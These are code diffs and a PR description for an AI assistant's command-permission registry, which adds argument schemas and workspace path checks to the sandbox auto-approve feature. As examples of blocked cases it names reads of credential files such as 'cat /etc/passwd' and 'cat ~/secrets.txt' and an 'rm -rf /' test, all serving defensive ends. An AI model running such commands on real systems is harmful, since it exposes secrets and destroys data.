-    argSchema: { positionals: "none" },
-  },
+  uniq: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
+  cut: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
   tr: {
     baseRisk: "low",
     sandboxAutoApprove: true,

--- a/assistant/src/permissions/command-registry.ts
+++ b/assistant/src/permissions/command-registry.ts
@@ -140,7 +140,6 @@ export const DEFAULT_COMMAND_REGISTRY = {
   },
   awk: {
     baseRisk: "medium",
-    sandboxAutoApprove: true,
     argSchema: {
       positionals: [{ role: "script" }, { role: "path", rest: true }],
     },
@@ -192,7 +191,6 @@ export const DEFAULT_COMMAND_REGISTRY = {
   // registry adds arg rules for -exec/-execdir/-delete which escalate to high.
   find: {
     baseRisk: "low",
-    sandboxAutoApprove: true,
     argSchema: {
       valueFlags: [
         "-name",

--- a/assistant/src/permissions/command-registry.ts
+++ b/assistant/src/permissions/command-registry.ts
@@ -360,15 +360,17 @@ export const DEFAULT_COMMAND_REGISTRY = {
   // Divergences are noted inline.
   git: {
     baseRisk: "medium",
-    globalValueFlags: [
-      "-C",
-      "-c",
-      "--git-dir",
-      "--work-tree",
-      "--namespace",
-      "--super-prefix",
-      "--config-env",
-    ],
+    argSchema: {
+      valueFlags: [
+        "-C",
+        "-c",
+        "--git-dir",
+        "--work-tree",
+        "--namespace",
+        "--super-prefix",
+        "--config-env",
+      ],
+    },
     subcommands: {
       // LOW_RISK_GIT_SUBCOMMANDS from checker.ts:
       status: { baseRisk: "low" },
@@ -463,7 +465,9 @@ export const DEFAULT_COMMAND_REGISTRY = {
   // they download and execute code, with subcommand-level overrides.
   npm: {
     baseRisk: "medium",
-    globalValueFlags: ["--prefix", "--userconfig", "--globalconfig", "--cache"],
+    argSchema: {
+      valueFlags: ["--prefix", "--userconfig", "--globalconfig", "--cache"],
+    },
     subcommands: {
       ls: { baseRisk: "low" },
       list: { baseRisk: "low" },
@@ -637,7 +641,9 @@ export const DEFAULT_COMMAND_REGISTRY = {
   // ── Docker ─────────────────────────────────────────────────────────────────
   docker: {
     baseRisk: "medium",
-    globalValueFlags: ["--host", "-H", "--config", "--context", "--log-level"],
+    argSchema: {
+      valueFlags: ["--host", "-H", "--config", "--context", "--log-level"],
+    },
     subcommands: {
       ps: { baseRisk: "low" },
       images: { baseRisk: "low" },
@@ -869,7 +875,7 @@ export const DEFAULT_COMMAND_REGISTRY = {
   // ── Version control tools ──────────────────────────────────────────────────
   gh: {
     baseRisk: "low",
-    globalValueFlags: ["--repo", "-R"],
+    argSchema: { valueFlags: ["--repo", "-R"] },
     subcommands: {
       pr: {
         baseRisk: "low",

--- a/assistant/src/permissions/command-registry.ts
+++ b/assistant/src/permissions/command-registry.ts
@@ -31,10 +31,11 @@ const TMP_PATHS = String.raw`^(?:/tmp|/var/tmp|\./|\.\.\/)`;
 
 export const DEFAULT_COMMAND_REGISTRY = {
   // ── Read-only filesystem commands ──────────────────────────────────────────
-  ls: { baseRisk: "low", sandboxAutoApprove: true },
+  ls: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
   cat: {
     baseRisk: "low",
     sandboxAutoApprove: true,
+    argSchema: {},
     argRules: [
       {
         id: "cat:sensitive",
@@ -44,35 +45,90 @@ export const DEFAULT_COMMAND_REGISTRY = {
       },
     ],
   },
-  head: { baseRisk: "low", sandboxAutoApprove: true },
-  tail: { baseRisk: "low", sandboxAutoApprove: true },
-  less: { baseRisk: "low", sandboxAutoApprove: true },
-  more: { baseRisk: "low", sandboxAutoApprove: true },
-  wc: { baseRisk: "low", sandboxAutoApprove: true },
-  file: { baseRisk: "low", sandboxAutoApprove: true },
-  stat: { baseRisk: "low", sandboxAutoApprove: true },
-  du: { baseRisk: "low", sandboxAutoApprove: true },
-  df: { baseRisk: "low", sandboxAutoApprove: true },
-  diff: { baseRisk: "low", sandboxAutoApprove: true },
-  tree: { baseRisk: "low", sandboxAutoApprove: true },
-  pwd: { baseRisk: "low", sandboxAutoApprove: true },
-  realpath: { baseRisk: "low", sandboxAutoApprove: true },
-  basename: { baseRisk: "low", sandboxAutoApprove: true },
-  dirname: { baseRisk: "low", sandboxAutoApprove: true },
-  readlink: { baseRisk: "low", sandboxAutoApprove: true },
+  head: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
+  tail: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
+  less: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
+  more: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
+  wc: {
+    baseRisk: "low",
+    sandboxAutoApprove: true,
+    argSchema: { positionals: "none" },
+  },
+  file: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
+  stat: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
+  du: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
+  df: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
+  diff: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
+  tree: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
+  pwd: {
+    baseRisk: "low",
+    sandboxAutoApprove: true,
+    argSchema: { positionals: "none" },
+  },
+  realpath: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
+  basename: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
+  dirname: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
+  readlink: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
 
   // ── Search / filter / text processing ──────────────────────────────────────
-  grep: { baseRisk: "low", sandboxAutoApprove: true },
-  rg: { baseRisk: "low", sandboxAutoApprove: true },
-  ag: { baseRisk: "low", sandboxAutoApprove: true },
-  ack: { baseRisk: "low", sandboxAutoApprove: true },
-  sort: { baseRisk: "low", sandboxAutoApprove: true },
-  uniq: { baseRisk: "low", sandboxAutoApprove: true },
-  cut: { baseRisk: "low", sandboxAutoApprove: true },
-  tr: { baseRisk: "low", sandboxAutoApprove: true },
+  grep: {
+    baseRisk: "low",
+    sandboxAutoApprove: true,
+    argSchema: {
+      positionals: [{ role: "pattern" }, { role: "path", rest: true }],
+    },
+  },
+  rg: {
+    baseRisk: "low",
+    sandboxAutoApprove: true,
+    argSchema: {
+      positionals: [{ role: "pattern" }, { role: "path", rest: true }],
+    },
+  },
+  ag: {
+    baseRisk: "low",
+    sandboxAutoApprove: true,
+    argSchema: {
+      positionals: [{ role: "pattern" }, { role: "path", rest: true }],
+    },
+  },
+  ack: {
+    baseRisk: "low",
+    sandboxAutoApprove: true,
+    argSchema: {
+      positionals: [{ role: "pattern" }, { role: "path", rest: true }],
+    },
+  },
+  sort: {
+    baseRisk: "low",
+    sandboxAutoApprove: true,
+    argSchema: {
+      valueFlags: ["-o", "--output"],
+      pathFlags: { "-o": true, "--output": true },
+      positionals: "none",
+    },
+  },
+  uniq: {
+    baseRisk: "low",
+    sandboxAutoApprove: true,
+    argSchema: { positionals: "none" },
+  },
+  cut: {
+    baseRisk: "low",
+    sandboxAutoApprove: true,
+    argSchema: { positionals: "none" },
+  },
+  tr: {
+    baseRisk: "low",
+    sandboxAutoApprove: true,
+    argSchema: { positionals: "none" },
+  },
   sed: {
     baseRisk: "low",
     sandboxAutoApprove: true,
+    argSchema: {
+      positionals: [{ role: "script" }, { role: "path", rest: true }],
+    },
     argRules: [
       {
         id: "sed:inplace",
@@ -85,13 +141,24 @@ export const DEFAULT_COMMAND_REGISTRY = {
   awk: {
     baseRisk: "medium",
     sandboxAutoApprove: true,
+    argSchema: {
+      positionals: [{ role: "script" }, { role: "path", rest: true }],
+    },
     complexSyntax: true,
     reason: "Can execute shell commands via system()",
   },
 
   // ── System information (read-only) ─────────────────────────────────────────
-  echo: { baseRisk: "low", sandboxAutoApprove: true },
-  printf: { baseRisk: "low", sandboxAutoApprove: true },
+  echo: {
+    baseRisk: "low",
+    sandboxAutoApprove: true,
+    argSchema: { positionals: "none" },
+  },
+  printf: {
+    baseRisk: "low",
+    sandboxAutoApprove: true,
+    argSchema: { positionals: "none" },
+  },
   whoami: { baseRisk: "low" },
   uname: { baseRisk: "low" },
   uptime: { baseRisk: "low" },
@@ -117,8 +184,8 @@ export const DEFAULT_COMMAND_REGISTRY = {
   hexdump: { baseRisk: "low" },
 
   // ── Data processing ────────────────────────────────────────────────────────
-  jq: { baseRisk: "low", sandboxAutoApprove: true },
-  yq: { baseRisk: "low", sandboxAutoApprove: true },
+  jq: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
+  yq: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
 
   // ── Find ───────────────────────────────────────────────────────────────────
   // DIVERGENCE: checker.ts lists `find` as LOW_RISK unconditionally. Our
@@ -126,6 +193,23 @@ export const DEFAULT_COMMAND_REGISTRY = {
   find: {
     baseRisk: "low",
     sandboxAutoApprove: true,
+    argSchema: {
+      valueFlags: [
+        "-name",
+        "-iname",
+        "-path",
+        "-ipath",
+        "-regex",
+        "-iregex",
+        "-maxdepth",
+        "-mindepth",
+        "-newer",
+        "-user",
+        "-group",
+        "-printf",
+        "-fprintf",
+      ],
+    },
     complexSyntax: true,
     argRules: [
       {
@@ -142,12 +226,16 @@ export const DEFAULT_COMMAND_REGISTRY = {
       },
     ],
   },
-  fd: { baseRisk: "low", sandboxAutoApprove: true },
+  fd: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
 
   // ── Write commands ─────────────────────────────────────────────────────────
   cp: {
     baseRisk: "medium",
     sandboxAutoApprove: true,
+    argSchema: {
+      valueFlags: ["-t", "--target-directory"],
+      pathFlags: { "-t": true, "--target-directory": true },
+    },
     argRules: [
       {
         id: "cp:system",
@@ -160,6 +248,7 @@ export const DEFAULT_COMMAND_REGISTRY = {
   mv: {
     baseRisk: "medium",
     sandboxAutoApprove: true,
+    argSchema: {},
     argRules: [
       {
         id: "mv:system",
@@ -169,17 +258,25 @@ export const DEFAULT_COMMAND_REGISTRY = {
       },
     ],
   },
-  mkdir: { baseRisk: "medium", sandboxAutoApprove: true },
-  touch: { baseRisk: "medium", sandboxAutoApprove: true },
-  ln: { baseRisk: "medium", sandboxAutoApprove: true },
+  mkdir: { baseRisk: "medium", sandboxAutoApprove: true, argSchema: {} },
+  touch: { baseRisk: "medium", sandboxAutoApprove: true, argSchema: {} },
+  ln: {
+    baseRisk: "medium",
+    sandboxAutoApprove: true,
+    argSchema: {
+      valueFlags: ["-t", "--target-directory"],
+      pathFlags: { "-t": true, "--target-directory": true },
+    },
+  },
   // DIVERGENCE: checker.ts lists `tee` as LOW_RISK. Our registry classifies
   // it as medium because it writes to files.
-  tee: { baseRisk: "medium", sandboxAutoApprove: true },
+  tee: { baseRisk: "medium", sandboxAutoApprove: true, argSchema: {} },
 
   // ── Delete commands ────────────────────────────────────────────────────────
   rm: {
     baseRisk: "high",
     sandboxAutoApprove: true,
+    argSchema: {},
     argRules: [
       {
         id: "rm:recursive-force",
@@ -213,7 +310,7 @@ export const DEFAULT_COMMAND_REGISTRY = {
       },
     ],
   },
-  rmdir: { baseRisk: "high", sandboxAutoApprove: true },
+  rmdir: { baseRisk: "high", sandboxAutoApprove: true, argSchema: {} },
 
   // ── Network commands ───────────────────────────────────────────────────────
   curl: {
@@ -596,16 +693,19 @@ export const DEFAULT_COMMAND_REGISTRY = {
   chmod: {
     baseRisk: "high",
     sandboxAutoApprove: true,
+    argSchema: {},
     reason: "Changes file permissions",
   },
   chown: {
     baseRisk: "high",
     sandboxAutoApprove: true,
+    argSchema: {},
     reason: "Changes file ownership",
   },
   chgrp: {
     baseRisk: "high",
     sandboxAutoApprove: true,
+    argSchema: {},
     reason: "Changes file group",
   },
   mount: { baseRisk: "high", reason: "Mounts filesystem" },
@@ -744,15 +844,27 @@ export const DEFAULT_COMMAND_REGISTRY = {
   // it as medium because it executes commands with piped arguments.
   xargs: {
     baseRisk: "medium",
-    sandboxAutoApprove: true,
     complexSyntax: true,
     reason: "Executes command with piped arguments",
   },
-  tar: { baseRisk: "medium", sandboxAutoApprove: true, complexSyntax: true },
-  zip: { baseRisk: "medium", sandboxAutoApprove: true },
-  unzip: { baseRisk: "medium", sandboxAutoApprove: true },
-  gzip: { baseRisk: "medium", sandboxAutoApprove: true },
-  gunzip: { baseRisk: "medium", sandboxAutoApprove: true },
+  tar: {
+    baseRisk: "medium",
+    sandboxAutoApprove: true,
+    argSchema: {
+      valueFlags: ["-C", "--directory", "-f", "--file"],
+      pathFlags: {
+        "-C": true,
+        "--directory": true,
+        "-f": true,
+        "--file": true,
+      },
+    },
+    complexSyntax: true,
+  },
+  zip: { baseRisk: "medium", sandboxAutoApprove: true, argSchema: {} },
+  unzip: { baseRisk: "medium", sandboxAutoApprove: true, argSchema: {} },
+  gzip: { baseRisk: "medium", sandboxAutoApprove: true, argSchema: {} },
+  gunzip: { baseRisk: "medium", sandboxAutoApprove: true, argSchema: {} },
 
   // ── Version control tools ──────────────────────────────────────────────────
   gh: {

--- a/assistant/src/permissions/risk-types.ts
+++ b/assistant/src/permissions/risk-types.ts
@@ -156,6 +156,8 @@ export interface CommandRiskSpec {
    * Global flags that consume the next token as a value (e.g. git -C <path>).
    * Used by resolveSubcommand to skip past flag-value pairs when locating the
    * first positional arg (the subcommand name).
+   *
+   * @deprecated Use argSchema.valueFlags instead. Kept for backward compatibility during migration.
    */
   globalValueFlags?: string[];
   /**

--- a/assistant/src/permissions/risk-types.ts
+++ b/assistant/src/permissions/risk-types.ts
@@ -163,6 +163,64 @@ export interface CommandRiskSpec {
    * without consulting the user's autoApproveUpTo threshold.
    */
   sandboxAutoApprove?: boolean;
+  /**
+   * Arg-parsing schema for extracting structured argument information.
+   * Used by `parseArgs()` to classify args into flags, positionals, and
+   * path arguments for downstream path-based policy checks.
+   */
+  argSchema?: ArgSchema;
+}
+
+// ── Arg schema types ─────────────────────────────────────────────────────────
+
+/** Describes the role of a positional argument in a command. */
+export interface PositionalDesc {
+  /** The semantic role of this positional argument. */
+  role: "path" | "pattern" | "script" | "value" | "command";
+  /**
+   * When true, this descriptor applies to all subsequent positionals too
+   * (i.e. the remaining args are all of this role).
+   */
+  rest?: boolean;
+}
+
+/**
+ * Schema for parsing a command's arguments into structured data.
+ *
+ * Drives the `parseArgs()` utility to classify each token as a flag,
+ * positional, or path argument.
+ */
+export interface ArgSchema {
+  /** Flags that consume the next token as a value (e.g. `-o`, `--output`). */
+  valueFlags?: string[];
+  /**
+   * Describes how positional arguments should be interpreted:
+   * - `"paths"` (or omitted): all positionals are filesystem paths
+   * - `"none"`: no positionals are filesystem paths
+   * - `PositionalDesc[]`: per-index role descriptors
+   */
+  positionals?: "paths" | "none" | PositionalDesc[];
+  /** Flag names whose consumed values are filesystem paths (e.g. `{ "-t": true }`). */
+  pathFlags?: Record<string, true>;
+  /**
+   * Whether `--` ends flag parsing (everything after is positional).
+   * Defaults to `true` when omitted.
+   */
+  respectsDoubleDash?: boolean;
+}
+
+/**
+ * The result of parsing a command's arguments via `parseArgs()`.
+ */
+export interface ParsedArgs {
+  /** Flag name to value (`true` for boolean flags, string for value-consuming flags). */
+  flags: Map<string, string | true>;
+  /** All positional arguments in order. */
+  positionals: string[];
+  /** Subset of positionals and flag values that are filesystem paths. */
+  pathArgs: string[];
+  /** Whether a `--` double-dash terminator was encountered. */
+  sawDoubleDash: boolean;
 }
 
 // ── User rule types ──────────────────────────────────────────────────────────

--- a/assistant/src/permissions/workspace-policy.ts
+++ b/assistant/src/permissions/workspace-policy.ts
@@ -116,8 +116,9 @@ export function isWorkspaceScopedInvocation(
 
   // Bash workspace scope depends on the environment: containerized bash has the
   // entire filesystem as workspace, so it's always workspace-scoped. Non-containerized
-  // bash is NOT workspace-scoped here — real path resolution (Phase 2) will handle it.
-  // The approval policy's sandbox auto-approve check handles allowlisted commands separately.
+  // bash is NOT workspace-scoped here — path resolution for allowlisted commands is
+  // handled upstream in the checker's hasSandboxAutoApprove computation, which validates
+  // all path arguments against the workspace root for non-containerized environments.
   if (toolName === "bash") return getIsContainerized();
 
   // Unknown tool — conservative default.


### PR DESCRIPTION
## Summary
Extends sandbox auto-approve to non-containerized self-hosted users by adding a shared `ArgSchema` to `CommandRiskSpec` that describes command argument structure (which flags consume values, which positionals are paths), a `parseArgs()` function that extracts path arguments, and workspace containment checks in the checker.

**Key changes:**
- Non-containerized bash commands with workspace-scoped paths now auto-approve (e.g. `ls`, `cat README.md`, `grep 'pattern' src/*.ts`)
- Commands targeting paths outside the workspace fall through to the threshold (e.g. `cat /etc/passwd`, `cat ~/secrets.txt`)
- `~` expansion correctly identifies home directory paths as outside workspace
- `xargs` removed from sandbox auto-approve allowlist (it executes arbitrary commands)
- `globalValueFlags` migrated into `argSchema.valueFlags` (single source of truth)
- Classifier's `firstPositionalArg()` refactored to use shared `parseArgs()`

## Self-review result
GAPS FOUND — 2 gaps fixed in 1 fix PR:
1. `parseArgs` now handles `--flag=value` syntax (prevented path flag bypass)
2. Added missing `rm -rf /` non-containerized test case

## PRs merged into feature branch
- #27249: feat(permissions): add ArgSchema types and shared parseArgs() utility
- #27261: feat(permissions): populate argSchema for all sandboxAutoApprove commands
- #27260: refactor(permissions): migrate globalValueFlags into argSchema.valueFlags
- #27273: feat(permissions): path resolution for non-containerized sandbox auto-approve
- #27270: refactor(permissions): use parseArgs() in firstPositionalArg for subcommand resolution

### Fix PRs
- #27274: fix(permissions): handle --flag=value syntax in parseArgs and add missing rm test

Part of plan: sandbox-auto-approve-phase2.md
<!-- devin-review-badge-begin -->

---

<a href="https://app.devin.ai/review/vellum-ai/vellum-assistant/pull/27275" target="_blank">
  <picture>
    <source media="(prefers-color-scheme: dark)" srcset="https://static.devin.ai/assets/gh-open-in-devin-review-dark.svg?v=1">
    <img src="https://static.devin.ai/assets/gh-open-in-devin-review-light.svg?v=1" alt="Open in Devin Review">
  </picture>
</a>
<!-- devin-review-badge-end -->
